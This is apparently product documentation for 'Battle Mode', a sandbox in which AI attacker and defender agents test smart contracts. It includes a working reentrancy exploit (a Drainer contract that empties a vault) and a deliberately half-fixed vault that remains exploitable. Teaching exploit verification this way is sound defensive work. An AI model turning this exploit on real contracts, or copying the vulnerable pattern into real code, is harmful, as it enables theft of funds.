Battle Mode Overview
A red-team / blue-team sandbox that proves whether a finding is actually exploitable — and produces a verified fix PR.
Overview
Battle Mode is Cygent's most advanced feature. It answers the question every security team eventually faces at a high-stakes moment: is this finding actually exploitable in a live environment, or is it just a theoretical pattern?
The approach is simple in concept: put your contracts in a sandbox, set AI attackers loose on them, let AI defenders patch what the attackers exploit, and produce a PR containing only the fixes that actually stopped the attacks. No "we think this might matter"; only "we proved this was exploitable, and we proved the fix closes the door."
The core idea
Every audit produces findings. Findings carry severity labels, reasoning, and recommended fixes. But severity is a prediction: a model's best reasoning about how a bug might be exploited, based on the code. It is not a demonstration.
Battle Mode moves from prediction to demonstration:
Clone to sandbox
Clone your contracts into an isolated sandbox. Deploy with realistic state.
Red Team attacks
AI agents write real exploit transactions — not pseudo-code, actual calldata targeting your deployed contracts.
Blue Team patches
AI agents watch, then attempt fixes once exploits land. Each fix is verified against the exact exploit.
Retest
Red Team returns with fresh exploits against the patched code. Only surviving fixes count.
Ship the PR
Surface results: Exploited findings, Defended fixes, and a PR containing only verified fixes.
What you get at the end is categorically different from an audit. An audit says "this looks wrong." Battle Mode says "we exploited it; here's the exploit; here's the fix; we proved the fix holds."
When to use Battle Mode
Battle Mode is heavy — it runs longer, costs more compute, and requires your repo to have working build and test commands — so use it deliberately.
| Situation | Why Battle Mode fits |
|---|---|
| Pre-mainnet | The last gate before a deploy: a final stress test the code must survive before going live. |
| Post-audit, before release | Validate that remediation actually worked — not just compiled. |
| Contested findings | A finding looks real to Cygent but your team thinks it's a false positive. Let the attacker try to land it. |
| After a major refactor | Confirm the refactor didn't introduce anything new that a scanner-style audit would miss. |
It's not for every day. It's for moments when you need proof.
Requirements
Battle Mode is an opt-in experimental feature with a few non-trivial prerequisites:
Enable it: Go to the agent's Settings → Experimental section and toggle Battle Mode on. The Battle Mode tab appears once enabled.
| Prerequisite | Detail |
|---|---|
| Completed CARA audit | Battle Mode uses the finding list as its attack surface hint |
| Working build and test | forge build and forge test (or your custom commands) must pass from a fresh clone |
| Sandbox environment | Local Anvil (fast, ephemeral) or BattleChain (dedicated test network) |
| Deployment inputs | A deployment script or the constructor args + initial state needed to deploy |
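If the repo doesn't already include a deployment script, a minimal Foundry script is usually the easiest way to supply the deployment inputs. A sketch of the shape, where the Vault contract, its constructor args, and the deposit call are all hypothetical placeholders for your own protocol and initial state:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Script} from "forge-std/Script.sol";
import {Vault} from "../src/Vault.sol";

// Hypothetical deployment script: Vault, its constructor args, and the
// seeded deposit are placeholders for your own contracts and state.
contract Deploy is Script {
    function run() external {
        vm.startBroadcast();

        // Constructor args the sandbox needs to reproduce a realistic deploy.
        Vault vault = new Vault({admin: msg.sender, withdrawalDelay: 1 days});

        // Seed realistic initial state so exploits run against something
        // resembling production, not an empty contract.
        vault.deposit{value: 100 ether}();

        vm.stopBroadcast();
    }
}
```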
Only run Battle Mode on code you own or have explicit permission to test. The whole point is that the attacker agents genuinely try to exploit the deployed contracts. Pointing Battle Mode at someone else's protocol without authorization is, at minimum, bad manners and potentially illegal.
Red Team vs Blue Team
The agents split along the classic security-exercise line.
Red Team — the attackers
The Red Team's job is to break things. They read the code, pull in the CARA finding context, and generate exploit transactions. For each known finding they try to write a working PoC. Then, once they've exercised the known findings, they go hunting for new vulnerabilities — attack surfaces CARA missed, composite exploits that chain multiple contracts, edge cases in state transitions.
When a Red Team exploit succeeds — funds drained, state corrupted, admin privileges taken — that finding is marked Exploited. That's the proof.
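Cygent doesn't document the exact PoC format, but a Foundry test against the sandboxed deployment is a reasonable mental model. A minimal sketch of what a successful reentrancy exploit might look like, where IVault, Drainer, and the BATTLE_TARGET env var are all hypothetical, not Cygent features:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical interface for the sandboxed target contract.
interface IVault {
    function deposit() external payable;
    function withdraw() external;
}

// Attacker contract: re-enters withdraw() while the vault's balance
// accounting is still stale.
contract Drainer {
    IVault immutable vault;

    constructor(IVault v) payable { vault = v; }

    function attack() external {
        vault.deposit{value: address(this).balance}();
        vault.withdraw();
    }

    receive() external payable {
        if (address(vault).balance >= 1 ether) {
            vault.withdraw(); // re-enter before the balance is zeroed
        }
    }
}

contract ExploitPoC is Test {
    function test_drainVault() external {
        // Address of the contract deployed in the Battle Mode sandbox
        // (BATTLE_TARGET is a hypothetical env var for this sketch).
        IVault vault = IVault(vm.envAddress("BATTLE_TARGET"));

        uint256 balanceBefore = address(vault).balance;
        Drainer drainer = new Drainer{value: 1 ether}(vault);
        drainer.attack();

        // "Exploited" means the sandbox state actually moved, not that
        // the code merely looks vulnerable.
        assertLt(address(vault).balance, balanceBefore);
    }
}
```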
Blue Team — the defenders
The Blue Team's job is to stop the exploits. Once a finding is Exploited, Blue Team agents take up to 3 attempts to patch it. Each patch is verified against the exact exploit the Red Team used — if the exploit no longer lands, the patch is a candidate fix.
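To make "verified against the exact exploit" concrete, here is a hypothetical patch for the reentrancy sketch above: zero the balance before the external call (checks-effects-interactions), so a re-entrant withdraw() sees nothing left to take.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical patched Vault, the kind of fix a Blue Team agent might
// propose against the Drainer PoC above.
contract Vault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");

        // Effect before interaction: a re-entrant call now sees a zero
        // balance, so the original exploit no longer lands.
        balances[msg.sender] = 0;

        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```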
The twist is the Retest phase. After Blue Team proposes a fix, Red Team comes back and tries to write a new exploit against the patched code. If Red Team can't find a new exploit that lands, the fix is marked Defended. If Red Team can bypass the fix, the fix is Bypassed and the finding stays open.
This is the critical mechanism. Any fix can look like it works against the original exploit. The question is whether the fix actually closes the class of bug or just the specific instance — and the only way to know is to let a fresh attacker try again.
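A hypothetical example of the difference: suppose the Blue Team guards only the function the original PoC used. The original exploit fails the verification step, but a fresh Red Team exploit re-enters through an unguarded sibling, and the fix is marked Bypassed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical fix that closes the instance but not the class: a
// reentrancy guard on withdraw() only, leaving withdrawTo() exposed.
contract PatchedVault {
    mapping(address => uint256) public balances;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Guarded: the original PoC no longer lands, so the patch looks good.
    function withdraw() external nonReentrant {
        (bool ok, ) = msg.sender.call{value: balances[msg.sender]}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0; // still updated after the call
    }

    // Unguarded sibling: the retest exploit re-enters here instead, so
    // the finding stays open and the fix is marked Bypassed.
    function withdrawTo(address payable to) external {
        (bool ok, ) = to.call{value: balances[msg.sender]}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0;
    }
}
```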
The output
When Battle Mode finishes, you get:
| Artifact | Contents |
|---|---|
| Scoreboard | Three counts (Exploited / Defended / Bypassed) across all findings in scope |
| PR | Only the Defended fixes. Fixes that got Bypassed are left out |
| Per-finding detail | Exploit code, fix diff, retest outcome |
| CSV export | For audit trails and compliance requirements |
See Reading Results for how to interpret the scoreboard.
Launching a battle
Enable the feature
Settings → Experimental → Battle Mode. Accept the risk acknowledgement.
Pick a target project
From the Battle Mode tab, select a project. Battle Mode only lists projects with a completed audit.
Configure the sandbox
Choose Local Anvil or BattleChain. Confirm your build/test commands. Provide deployment inputs if not already scripted.
Scope the battle
Optionally narrow scope to specific findings or contracts. Full-scope battles run longer but produce the most complete results.
Launch
Click Start Battle. Cygent spins up the sandbox, deploys your contracts, and begins the six-phase run.
Battles run asynchronously. You can leave the dashboard and come back — progress and results stream to the battle's page in real time.
See Battle Phases for the full phase-by-phase walkthrough.